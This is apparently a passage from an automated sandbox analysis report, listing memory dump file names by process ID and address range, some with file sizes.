                                                                      • memory/920-223-0x0000000000000000-mapping.dmp

                                                                      • memory/1092-226-0x0000000000000000-mapping.dmp

                                                                      • memory/1152-211-0x0000000000000000-mapping.dmp

                                                                      • memory/1160-187-0x0000000000000000-mapping.dmp

                                                                      • memory/1344-164-0x0000000000000000-mapping.dmp

                                                                      • memory/1816-131-0x0000000010000000-0x000000001000E000-memory.dmp

                                                                        Filesize

                                                                        56KB

                                                                      • memory/1816-136-0x0000000000CD0000-0x0000000000CDD000-memory.dmp

                                                                        Filesize

                                                                        52KB

                                                                      • memory/1816-130-0x0000000000000000-mapping.dmp

                                                                      • memory/1860-161-0x0000000000000000-mapping.dmp

                                                                      • memory/1932-153-0x0000000000000000-mapping.dmp

                                                                      • memory/1976-215-0x0000000000000000-mapping.dmp

                                                                      • memory/1980-231-0x0000000000000000-mapping.dmp

                                                                      • memory/2232-195-0x0000000000000000-mapping.dmp

                                                                      • memory/2256-207-0x0000000000000000-mapping.dmp

                                                                      • memory/2400-213-0x0000000000000000-mapping.dmp

                                                                      • memory/2528-227-0x0000000000000000-mapping.dmp

                                                                      • memory/2588-217-0x0000000000000000-mapping.dmp

                                                                      • memory/2616-162-0x0000000000000000-mapping.dmp

                                                                      • memory/2616-166-0x00000000005A6B20-0x00000000005A6B24-memory.dmp

                                                                        Filesize

                                                                        4B

                                                                      • memory/2616-170-0x0000000000A70000-0x0000000000B06000-memory.dmp

                                                                        Filesize

                                                                        600KB

                                                                      • memory/2720-146-0x0000000000000000-mapping.dmp

                                                                      • memory/2728-198-0x0000000000000000-mapping.dmp

                                                                      • memory/2876-176-0x0000000000000000-mapping.dmp

                                                                      • memory/3020-179-0x00000000084A0000-0x00000000085DA000-memory.dmp

                                                                        Filesize

                                                                        1.2MB

                                                                      • memory/3020-169-0x000000000B160000-0x000000000B29B000-memory.dmp

                                                                        Filesize

                                                                        1.2MB

                                                                      • memory/3020-160-0x0000000007E40000-0x0000000007EE3000-memory.dmp

                                                                        Filesize

                                                                        652KB

                                                                      • memory/3020-188-0x0000000007E40000-0x0000000007EE3000-memory.dmp

                                                                        Filesize

                                                                        652KB

                                                                      • memory/3144-197-0x0000000000000000-mapping.dmp

                                                                      • memory/3448-159-0x000001E7C59B0000-0x000001E7C5A53000-memory.dmp

                                                                        Filesize

                                                                        652KB

                                                                      • memory/3484-204-0x0000000000000000-mapping.dmp

                                                                      • memory/3516-209-0x0000000000000000-mapping.dmp

                                                                      • memory/3576-199-0x0000000000000000-mapping.dmp

                                                                      • memory/3656-163-0x0000000000000000-mapping.dmp

                                                                      • memory/3720-165-0x0000019D12F00000-0x0000019D12FA3000-memory.dmp

                                                                        Filesize

                                                                        652KB

                                                                      • memory/3932-142-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp

                                                                        Filesize

                                                                        10.8MB

                                                                      • memory/3932-141-0x000001CF6D940000-0x000001CF6D962000-memory.dmp

                                                                        Filesize

                                                                        136KB

                                                                      • memory/3932-158-0x000001CF6F4E0000-0x000001CF6F51D000-memory.dmp

                                                                        Filesize

                                                                        244KB

                                                                      • memory/3932-140-0x0000000000000000-mapping.dmp

                                                                      • memory/3932-157-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp

                                                                        Filesize

                                                                        10.8MB

                                                                      • memory/3936-183-0x0000000000000000-mapping.dmp

                                                                      • memory/3936-201-0x0000000000000000-mapping.dmp

                                                                      • memory/4020-178-0x0000000000000000-mapping.dmp

                                                                      • memory/4036-225-0x0000000000000000-mapping.dmp

                                                                      • memory/4104-167-0x00000204A5A10000-0x00000204A5AB3000-memory.dmp

                                                                        Filesize

                                                                        652KB

                                                                      • memory/4240-189-0x0000000000000000-mapping.dmp

                                                                      • memory/4276-218-0x0000000000000000-mapping.dmp

                                                                      • memory/4388-192-0x0000000000000000-mapping.dmp

                                                                      • memory/4448-193-0x0000000000000000-mapping.dmp

                                                                      • memory/4452-190-0x0000000000000000-mapping.dmp

                                                                      • memory/4456-212-0x0000000000000000-mapping.dmp

                                                                      • memory/4472-202-0x0000000000000000-mapping.dmp

                                                                      • memory/4616-206-0x0000000000000000-mapping.dmp

                                                                      • memory/4668-185-0x0000000000000000-mapping.dmp

                                                                      • memory/4892-229-0x0000000000000000-mapping.dmp

                                                                      • memory/4912-219-0x0000000000000000-mapping.dmp

                                                                      • memory/5012-221-0x0000000000000000-mapping.dmp

                                                                      • memory/5028-174-0x0000000000000000-mapping.dmp

                                                                      • memory/5088-230-0x0000000000000000-mapping.dmp